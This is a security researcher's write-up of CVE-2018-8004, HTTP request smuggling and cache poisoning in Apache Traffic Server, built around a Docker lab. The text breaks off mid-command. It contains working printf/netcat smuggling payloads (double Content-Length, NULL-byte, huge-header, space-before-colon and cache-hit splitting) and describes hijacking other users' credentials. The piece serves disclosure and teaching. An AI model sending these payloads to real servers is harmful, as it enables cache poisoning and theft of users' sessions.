As stated in the CVE announcement (2018-08-28), impacted ATS versions are 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released on 2018-08-02 and 6.2.3 on 2018-08-04. That's the official announcement, but I think 7.1.3 contained most of the fixes already, and is maybe not vulnerable. The announcement was mostly delayed for the 6.x backports (and some other fixes were released at the same time, for other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out-of-support versions.

CVE-2018-8004

The official CVE description is:

    There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS.

Which does not give a lot of pointers, but there is much more information in the 4 pull requests listed:

- #3192: Return 400 if there is whitespace after the field name and before the colon
- #3201: Close the connection when returning a 400 error response
- #3231: Validate Content-Length headers for incoming requests
- #3251: Drain the request body if there is a cache hit

If you have already studied some of my previous posts, some of these sentences might already seem dubious. For example, not closing a response stream after an error 400 is clearly a fault based on the standards, but it is also a good catch for an attacker: chances are that by crafting a bad message chain you may succeed in receiving a response for some queries hidden in the body of an invalid request. The last one, "Drain the request body if there is a cache hit", is the nicest one, as we will see in this article, and it was hard to detect.
My original report listed 5 issues:

- HTTP request splitting using NULL character in header value
- HTTP request splitting using huge header size
- HTTP request splitting using double Content-Length headers
- HTTP cache poisoning using extra space before separator of header name and header value
- HTTP request splitting using ... (no spoiler: I keep that for the end)

Step by step Proof of Concept

To understand the issues, and see the effects, we will be using a demonstration/research environment. If you ever want to test HTTP Smuggling issues you should really, really try to test them in a controlled environment. Testing issues on live environments would be difficult because:

- You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your successes and errors.
- You may trigger errors and behaviors that you have no idea about. For example, I encountered random, unreproducible errors on several fuzzing tests (on test envs) before understanding that they were related to the last smuggling issue we will study in this article. Effects were delayed on subsequent tests, and I was not in control, at all.
- You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self-reflected XSS; you could end up in court for that.
- Real-life complete examples usually occur with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Node.js, etc. You will have to understand how each actor interacts with the others, and you will see it faster with a local low-level network capture than blindly across an unknown chain of agents (for example, when learning how to detect each agent on this chain).

So it is very important to be able to rebuild a laboratory environment.
And, if you find something, this env can then be used to send detailed bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues; a working demo helps).

Set-up the lab: Docker instances

We will run 2 Apache Traffic Server instances, one in version 6.x and one in version 7.x. To add some variety, and potential smuggling issues, we will also add an Nginx docker and an HaProxy one.

4 HTTP actors, each one on a local port:

- 127.0.0.1:8001 : HaProxy (internally listening on port 80)
- 127.0.0.1:8002 : Nginx (internally listening on port 80)
- 127.0.0.1:8007 : ATS7 (internally listening on port 8080)
- 127.0.0.1:8006 : ATS6 (internally listening on port 8080); most examples will use ATS7, but you will be able to test this older version simply by using this port instead of the other (and altering the domain)

We will chain some reverse proxy relations: Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6).

Note that the localhost port mappings of the ATS and Nginx instances are not directly needed: if you can inject a request into HaProxy it will reach Nginx internally, via port 8080 of one of the ATS instances and port 80 of Nginx. But they can be useful if you want to target one of the servers directly, and we will have to avoid the HaProxy part in most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to succeed in targeting 8001; that will be harder.
              +---[80]---+
              | 8001->80 |
              | HaProxy  |
              |          |
              +--+---+---+
 [dummy-host6.    |   |    [dummy-host7.
  example.com]    |   |     example.com]
        +---------+   +---------+
        |                       |
 +-[8080]-----+          +-[8080]-----+
 | 8006->8080 |          | 8007->8080 |
 |    ATS6    |          |    ATS7    |
 |            |          |            |
 +-----+------+          +----+-------+
       |                      |
       +----------+-----------+
                  |
             +--[80]----+
             | 8002->80 |
             |  Nginx   |
             |          |
             +----------+

To build this cluster we will use docker-compose. You can find the docker-compose.yml file here, but the content is quite short:

version: '3'

services:
  haproxy:
    image: haproxy:1.6
    build:
      context: .
      dockerfile: Dockerfile-haproxy
    expose:
      - 80
    ports:
      - "8001:80"
    links:
      - ats7:linkedats7.net
      - ats6:linkedats6.net
    depends_on:
      - ats7
      - ats6
  ats7:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats7
    expose:
      - 8080
    ports:
      - "8007:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  ats6:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats6
    expose:
      - 8080
    ports:
      - "8006:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  nginx:
    image: nginx:latest
    build:
      context: .
      dockerfile: Dockerfile-nginx
    expose:
      - 80
    ports:
      - "8002:80"

To make this work you will also need the 4 specific Dockerfiles:

- Dockerfile-haproxy: an HaProxy Dockerfile, with the right conf
- Dockerfile-nginx: a very simple Nginx Dockerfile with one index.html page
- Dockerfile-ats7: an ATS 7.1.1 compiled-from-archive Dockerfile
- Dockerfile-ats6: an ATS 6.2.2 compiled-from-archive Dockerfile

Put all these files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir:

docker-compose build && docker-compose up

You can now take a big break; you are launching two compilations of ATS. Hopefully the next time an up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element to the cluster, to test the fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions.
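As an aside, the printf | nc probes used throughout this article can also be driven from Python, which makes it easier to script variations. A small helper sketch (it assumes the lab above is up on the mapped localhost ports; nothing here is part of the original article):

```python
import socket

def build(*lines: str) -> bytes:
    """Join raw header lines with CRLF and terminate the header block,
    mimicking the printf '...\\r\\n' patterns used in this article."""
    return ("\r\n".join(lines) + "\r\n\r\n").encode()

def raw_request(payload: bytes, host: str = "127.0.0.1", port: int = 8007,
                timeout: float = 3.0) -> bytes:
    """Send raw bytes to one of the lab listeners (like nc would) and return
    everything that comes back, including multiple pipelined responses."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
        return b"".join(chunks)

# Example probe against the Nginx backend (port 8002), once the lab is up:
# raw_request(build("GET / HTTP/1.1", "Host:dummy-host7.example.com"), port=8002)
```

Unlike curl or wget, this sends the bytes exactly as given, so deliberately malformed queries stay malformed.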
Test That Everything Works

We will run basic non-attacking queries on this installation, to check that everything works and to train ourselves in the printf + netcat way of running queries. We will not use curl or wget to run HTTP queries, because they make it impossible to write bad queries. So we need to use low-level string manipulation (with printf, for example) and socket handling (with netcat -- or nc --).

Test Nginx (that's a one-liner split for readability):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8002

You should get the index.html response, something like:

HTTP/1.1 200 OK
Server: nginx/1.15.5
Date: Fri, 26 Oct 2018 15:28:20 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
Connection: keep-alive
ETag: "5bd321bc-78"
X-Location-echo: /
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Then test ATS7 and ATS6:

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8007

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8006

Then test HaProxy; altering the Host name should make the transit go via ATS7 or ATS6 (check the Server: header of the response):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

And now let's start some more complex HTTP stuff: we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks:

# send one pipelined chain of queries
printf 'GET /?cache=1 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=2 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=3 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
'GET /?cache=4 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

This is pipelining; it's not only using HTTP keep-alive, because we send the chain of queries without waiting for the responses. See my previous post for details on keep-alive and pipelining. You should get the Nginx access log on the docker-compose output. If you do not rotate some arguments in the query, Nginx won't be reached by your requests, because ATS is already caching the result (CTRL+C on the docker-compose output and docker-compose up will remove any cache).

Request Splitting by Double Content-Length

Let's start playing for real. That's the 101 of HTTP Smuggling: the easy vector. Double Content-Length header support is strictly forbidden by RFC 7230 section 3.3.3 (bold added):

    If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response.

Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005).
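To make the ambiguity concrete, this sketch rebuilds offline the exact message used in the next test against ATS and checks that the hidden request is 66 bytes long, which is the value the second Content-Length header must carry:

```python
# The hidden second request, byte for byte as in the attack below.
hidden = (
    b"GET /index.html?toto=2 HTTP/1.1\r\n"
    b"Host: dummy-host7.example.com\r\n"
    b"\r\n"
)

# The outer request with the two conflicting Content-Length headers.
outer = (
    b"GET /index.html?toto=1 HTTP/1.1\r\n"
    b"Host: dummy-host7.example.com\r\n"
    b"Content-Length: 0\r\n" +
    b"Content-Length: " + str(len(hidden)).encode() + b"\r\n"
    b"\r\n"
) + hidden

# An agent honoring the first header (0) sees a second pipelined request;
# an agent honoring the second header (66) consumes 'hidden' as a body.
```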
Sending such a query directly to ATS generates 2 responses (one 400 and one 200):

printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Content-Length: 0\r\n'\
'Content-Length: 66\r\n'\
'\r\n'\
'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

The regular response should be a single error 400. Using port 8001 (HaProxy) would not work; HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is critical request splitting: classical, but hard to reproduce in a real-life environment if some robust tools are used on the reverse proxy chain.

So, why critical? Because you could also consider ATS to be robust, use a new unknown HTTP server behind or in front of ATS, and expect such smuggling attacks to be properly detected. And there is another factor of criticality: any other issue in HTTP parsing can exploit this double Content-Length. Let's say you have another issue which allows you to hide one header from all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-Length and you're done, without being blocked by a previous actor. In our current case, ATS, you have one example of such a hidden-header issue with the 'space-before-:' that we will analyze later.

Request Splitting by NULL Character Injection

This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after that), and it's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character.

Using a NULL byte character in a header triggers a query rejection on ATS. That's OK, but it also triggers a premature end of query, and if you do not close pipelines after a first error, bad things can happen: the next line is interpreted as the next query in the pipeline.
So, a valid (almost, if you except the NULL character) pipeline like this one:

01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 X-Foo: Bar\r\n
04 \r\n
05 GET /index.html?bar=1 HTTP/1.1\r\n
06 Host: dummy-host7.example.com\r\n
07 \r\n

generates two 400 errors, because the second query starts with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there is no \r\n between the 2 queries):

01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 GET /index.html?bar=2 HTTP/1.1\r\n
04 Host: dummy-host7.example.com\r\n
05 \r\n

It generates one error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request splitting attack. But line 03 is a really bad header line that most agents would reject; you cannot read it as a valid unique query. The fake pipeline would be detected early as a bad query, since line 03 is clearly not a valid header line:

GET /index.html?bar=2 HTTP/1.1\r\n
!= <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF]

For the first line the syntax is one of these two forms:

<METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF]
<METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri)

LOCATION may be used to inject the special [:] that is required in a header line, especially in the query string part, but this would inject a lot of bad characters into the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try the ABSOLUTE-URI alternative syntax, where the [:] appears earlier in the line, and the only bad character for a header name would be the space. This will also fix the potential presence of a double Host header (an absolute uri replaces the Host header).
01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 X-Something: \0 something\r\n
04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n
05 \r\n

Here the bad header which becomes a query is line 04, and the header name is GET http with a header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space), but I'm pretty sure we could find some HTTP agents transferring this header (ATS is one proof of that: space characters in header names were allowed).

A real attack using this trick looks like this:

printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-Something: "\0something"\r\n'\
'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\
'\r\n'\
'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

This is just 2 queries (the 1st one has 2 bad headers: one with a NULL, one with a space in the header name); for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host7.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: header added by Nginx. After that, ATS adds a third response, a 404, but the previous actor expects only 2 responses, and the second response has already been replaced.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:34:53 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

Then:

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replacing=1&zorg=2
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

And then the extra unused response:

HTTP/1.1 404 Not Found
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 153
Age: 0
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.15.5</center>
</body>
</html>

If you try to use port 8001 (so transiting via HaProxy) you will not get the expected attacking result. That attacking query is really too bad:

HTTP/1.0 400 Bad request
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>400 Bad request</h1>
Your browser sent an invalid request.
</body></html>

That's an HTTP request splitting attack, but real-world usage may be hard to find. The fix on ATS is the 'close on error': when an error 400 is triggered, the pipeline is stopped and the socket is closed after the error.

Request Splitting using Huge Header, Early End-Of-Query

This attack is almost the same as the previous one, but does not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way as with the NULL premature end of query.

A note on huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1, for example):

X: ==============( 65 532 '=' )========================\r\n

You can use the %ns form in printf to generate this, producing a big number of spaces.
But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string:

printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " "

Try it against Nginx:

printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65532s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8002

I get one error 400; that's the normal stuff, Nginx does not like huge headers. Now try it against ATS7:

printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8007

And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header, but we do not have the NULL character. But, yeah, 65000 characters is very big; most actors would reject a query after 8000 characters on one line.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:40:17 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:40:17 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replaced=0&cache=8
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Cache Poisoning using Incomplete Queries and Bad Separator Prefix

Cache poisoning, that sounds great. In smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why split pipelines are dangerous.

ATS supports an invalid header syntax:

HEADER[SPACE]:HEADER VALUE\r\n

That does not conform to RFC 7230 section 3.2:

    Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace.

So:

HEADER:HEADER_VALUE\r\n                => OK
HEADER:[SPACE]HEADER_VALUE\r\n         => OK
HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n  => OK
HEADER[SPACE]:HEADER_VALUE\r\n         => NOT OK

And RFC 7230 section 3.2.4 adds (bold added):

    No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream.

ATS will interpret the bad header, and also forward it without alteration.
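The RFC 7230 rule is easy to check mechanically. A sketch of a strict validator (not from the article): field names must be made only of RFC 7230 "token" characters, so any whitespace before the colon fails the match and must yield a 400.

```python
import re

# tchar set from RFC 7230 section 3.2.6: the only bytes allowed in a field name.
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

def field_line_is_valid(line: str) -> bool:
    """Strict check of the part before the first colon, per RFC 7230 3.2.4."""
    name, sep, _value = line.partition(":")
    return bool(sep) and TOKEN.match(name) is not None
```

A parser built this way rejects "Content-Length :77" outright; the vulnerable behaviors come from agents that instead accept it (ATS) or silently drop it (Nginx).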
Using this flaw we can add some headers to our request that are invalid for any strict HTTP agent but are still interpreted by ATS, like:

Content-Length :77\r\n

Or (try it as an exercise):

Transfer-encoding :chunked\r\n

Some HTTP servers will effectively reject such a message with an error 400. But some will simply ignore the invalid header. That's the case with Nginx, for example. ATS will maintain a keep-alive connection to the Nginx backend, so we'll use this ignored header to transmit a body (ATS thinks it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a CRLF at end-of-header) to absorb a future query sent to Nginx. This sort of incomplete query, completed by the next incoming query, is also a basic smuggling technique demonstrated 13 years ago.

01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-Control: max-age=200\r\n
04 X-info: evil 1.5 query, bad CL header\r\n
05 Content-Length :117\r\n
06 \r\n
07 GET /index.html?INJECTED=1 HTTP/1.1\r\n
08 Host: dummy-host7.example.com\r\n
09 X-info: evil poisoning query\r\n
10 Dummy-incomplete:

Line 05 is invalid (' :'), but for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS, transmitted to the backend. For Nginx:

- Line 05 is ignored.
- Line 07 is a new request (and the first response is returned).
- Line 10 has no "\r\n", so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ...
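The value in the bad Content-Length header is not arbitrary: it must cover exactly the smuggled bytes of lines 07-10. A sketch reproducing the computation (using the 'Dummy-unterminated:' spelling of the attack loop later in this section, a single-digit INJECTED value, and no trailing CRLF on the last line):

```python
# Byte-for-byte, the "body" that ATS forwards and Nginx reads as a new,
# incomplete request.
smuggled = (
    "GET /index.html?INJECTED=1 HTTP/1.1\r\n"
    "Host: dummy-host7.example.com\r\n"
    "X-info: evil poisoning query\r\n"
    "Dummy-unterminated:"   # no CRLF: Nginx keeps waiting for more bytes
)

# ATS honors the bad "Content-Length :117" header and forwards exactly that
# many opaque body bytes; Nginx ignores the header entirely.
```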
Attack schema:

[ATS Cache poisoning - space before header separator + backend ignoring bad headers]

Innocent      Attacker           ATS                Nginx
    |             |               |                    |
    |             |--A(1A+1/2B)-->|                    |  * Issue 1 & 2 *
    |             |               |--A(1A+1/2B)------->|  * Issue 3 *
    |             |               |<-A(404)------------|
    |             |               |             [1/2B] |
    |             |<-A(404)-------|             [1/2B] |
    |             |--C----------->|             [1/2B] |
    |             |               |--C---------------->|  * ending B *
    |             |        [*CP*]<--B(200)-------------|
    |             |<--B(200)------|                    |
    |--C------------------------->|                    |
    |<--B(200)-----------------[HIT]                   |

- 1A + 1/2B means request A plus an incomplete query B
- A(X): query X is hidden in the body of query A
- CP: cache poisoning
- Issue 1: ATS transmits 'header[SPACE]: Value', a bad HTTP header.
- Issue 2: ATS interprets this bad header as valid (so 1/2B stays hidden in the body).
- Issue 3: Nginx encounters the bad header but ignores it instead of sending an error 400, so 1/2B is discovered as a new query (it has no Content-Length).
- Request B contains an incomplete header (no CRLF).
- Ending B: the 1st line of query C ends the incomplete header of query B; all other headers of C are added to the query. C disappears and mixes C's HTTP credentials with all the previous B headers (cookie/bearer token/Host, etc.).

Instead of cache poisoning you could also play with the incomplete 1/2B query and wait for the innocent query to finish this request with the HTTP credentials of that user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning.
Run this attack:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'X-info: evil 1.5 query, bad CL header\r\n'\
'Content-Length :117\r\n'\
'\r\n'\
'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
|nc -q 1 127.0.0.1 8007
done

It should work. In this lab configuration Nginx adds an X-Location-echo header containing the first line of the query, so we can observe that the second response drops the real second query's first line and replaces it with the hidden one. In my case the last query's response contained:

X-Location-echo: /index.html?INJECTED=3

But this last query was GET /index.html?INJECTED=9. You can check the cache content with:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007
done

In my case I found six regular 404s and three 200 responses (ouch): the cache is poisoned. If you want a deeper understanding of smuggling you should play with Wireshark on this example. Do not forget to restart the cluster to empty the cache.

Here we have not played with a C query yet; the cache poisoning occurs on our A queries (unless you consider the /does-not-exists.html?cache='$i' requests as C queries). But you can easily inject a C query on this cluster while Nginx has some waiting requests, and try to get it poisoned with the /index.html?INJECTED=3 responses:

for i in {1..9} ;do
printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007
done

This gives you a taste of real-world exploitation: you have to repeat the attack to obtain something.
Vary the number of servers in the cluster, the pool settings on the various layers of reverse proxies, etc., and things get complex. The easiest attack is to be a chaos generator (defacement-like or DoS); fine cache replacement of a specific target, on the other hand, requires careful study and a bit of luck.

Does this work on port 8001 with HaProxy? Well, no, of course not. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue to bury this bad request in a body, or you would need a load balancer that does not detect this invalid syntax. Note that in this example the Nginx behavior on invalid header syntax (ignoring it) is also not standard (and won't be fixed, AFAIK). This invalid space-prefix problem is the same issue as Apache httpd's CVE-2016-8743.

HTTP Response Splitting: Content-Length Ignored on Cache Hit

Still there? Great! Because now comes the nicest issue — at least for me it was, mainly because I spent a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce them I had failures, and successes on previously undetected issues, and back to step 1. Issues you cannot reproduce make you doubt you ever saw them; suddenly you find one again, then it's gone, etc. And of course I was not searching for the root cause in the right examples — I was, for example, triggering tests on bad chunked transmissions, or delayed chunks. It took a (too) long time before I realized that all this was linked to the cache hit/miss status of my requests.

On a cache hit, the Content-Length header of a GET query is not read. That's so easy once you know it... And exploitation is also quite easy: we can hide a second query in the first query's body, and on a cache hit this body becomes a new query.
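The cache-hit effect can be illustrated with a toy request splitter (a sketch, not ATS code; the framing logic and the hard-coded example requests are simplified assumptions modeling the behavior described):

```python
# Sketch of why ignoring Content-Length splits a request: a parser that
# honors it consumes the body as opaque bytes (one request), while one
# that skips it on a cache hit re-parses those bytes as a new request.

def count_requests(raw: bytes, honor_content_length: bool) -> int:
    count = 0
    while raw:
        head, sep, rest = raw.partition(b"\r\n\r\n")
        if not sep:                    # incomplete message, stop
            break
        count += 1
        clen = 0
        if honor_content_length:
            for line in head.split(b"\r\n")[1:]:
                name, _, value = line.partition(b":")
                if name.strip().lower() == b"content-length":
                    clen = int(value)
        raw = rest[clen:]              # skip the body (or re-parse it)
    return count

hidden = (b"GET /index.html?cache=zorg43 HTTP/1.1\r\n"
          b"Host: dummy-host7.example.com\r\n\r\n")
query = (b"GET /index.html?cache=zorg42 HTTP/1.1\r\n"
         b"Host: dummy-host7.example.com\r\n"
         b"Content-Length: %d\r\n\r\n" % len(hidden)) + hidden

assert count_requests(query, honor_content_length=True) == 1   # cache miss
assert count_requests(query, honor_content_length=False) == 2  # cache hit
```

Note that the Content-Length is computed from the hidden request's exact byte length; getting this count right is what makes the real attack payload below line up.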
This sort of query will get one response on the first launch (and yes, that's only one query), but on a second launch it will render two responses (an HTTP request splitting by definition):

01 GET /index.html?cache=zorg42 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-control: max-age=300\r\n
04 Content-Length: 71\r\n
05 \r\n
06 GET /index.html?cache=zorg43 HTTP/1.1\r\n
07 Host: dummy-host7.example.com\r\n
08 \r\n

Line 04 is ignored on a cache hit (so only after the first run); after that, line 06 is a new query and not just the first query's body. This HTTP query is valid: there is NO invalid HTTP syntax present. So it's quite easy to perform a successful complete smuggling attack from this issue, even with HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS, we can fool HaProxy's HTTP stream by sending a pipeline of two queries where ATS sees three:

Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length]

Something      HaProxy         ATS             Nginx
    |--A----------->|               |               |
    |               |--A----------->|               |
    |               |               |--A----------->|
    |               |          [cache]<--A----------|
    |<------(etc.)--|<--A-----------|               |   warmup
 ---------------------------------------------------------
    |--A(+B)+C----->|               |               |   attack
    |               |--A(+B)+C----->|               |
    |               |            [HIT]              |   * Bug *
    |               |               |               |   * B 'discovered' *
    |               |<--A-----------|               |
    |<--A-----------|               |--B----------->|
    |               |               |<--B-----------|
    |               |<--B-----------|               |
    [ouch]<--B------|               |               |   * wrong resp. *
    |               |               |--C----------->|
    |               |               |<--C-----------|
    |               [R]<--C---------|               |   rejected

First, we need to init the cache; we use port 8001 to get a stream HaProxy->ATS->Nginx.

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 0\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8001

You can run it twice and see that the second time it does not reach the Nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy.
We use a pipeline of two queries; ATS will send back three responses. If a keep-alive mode is present in front of ATS there is a security problem. Here that's the case because we do not use option http-close on HaProxy (which would prevent the use of pipelines).

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
